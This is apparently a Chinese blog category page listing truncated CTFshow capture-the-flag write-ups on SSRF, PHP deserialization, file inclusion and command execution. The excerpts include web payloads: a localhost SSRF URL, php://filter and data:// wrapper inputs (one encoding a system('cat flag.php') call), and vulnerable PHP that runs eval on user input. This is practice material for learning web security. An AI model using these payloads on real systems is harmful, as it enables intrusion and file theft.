![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTFSHOW
文章平均质量分 78
海上清辉
赵客缦胡缨,吴钩霜雪明。
银鞍照白马,飒沓如流星。
展开
-
CTFshow渔人赛---神仙姐姐
刚拿到题目时候,题目给了提示磕首千遍,原本准备在控制台上搞些骚操作,没搞出来反而发现每次拜后都会访问http://746d7288-51da-47d2-aff5-d71db85daac0.challenge.ctf.show:8080/sx.php没访问一次 就会加一次拜的次数所以 怀疑可以burpsuit直接intruder模块这里我没用burpsuit而是自己编写了个脚本 密码学 数据结构 让我编的奔溃 我要敲代码import requestsurl="http://01.原创 2021-05-13 16:34:14 · 765 阅读 · 0 评论 -
CTFSHOW SSRF
文章目录web351web352web351payload:url=http://127.0.0.1/flag.phpweb352源码<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$x=parse_url($url);if($x['scheme']==='http'||$x['scheme']==='https'){if(!preg_match('/localhost|127.0.0原创 2021-03-30 16:48:14 · 214 阅读 · 0 评论 -
CTFshow 反序列化
文章目录web254web255web256web257**题记:**今天来复习反序列化web254第一道题不是序列化和反序列化吧… error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; publ原创 2021-03-29 17:04:10 · 603 阅读 · 1 评论 -
CTFSHOW 文件包含
今天 复习一下文件包含漏洞web 78payload:?file=php://filter/convert.base64-encode/resource=flag.phpweb 79payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=web 80-81这道题开始就有技巧了源码 过滤了 php和data 伪协议用不了if(isset($_GET['file'])){ .原创 2021-03-27 16:17:04 · 207 阅读 · 0 评论 -
CTFSHOW WEB入门 命令执行做题笔记(持续更新)
校队考核被打自闭了 回炉重造文章目录29-362930313233-3637-443738394029-3629<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}大小写过滤了flag自己构造的p原创 2021-03-27 11:52:43 · 352 阅读 · 0 评论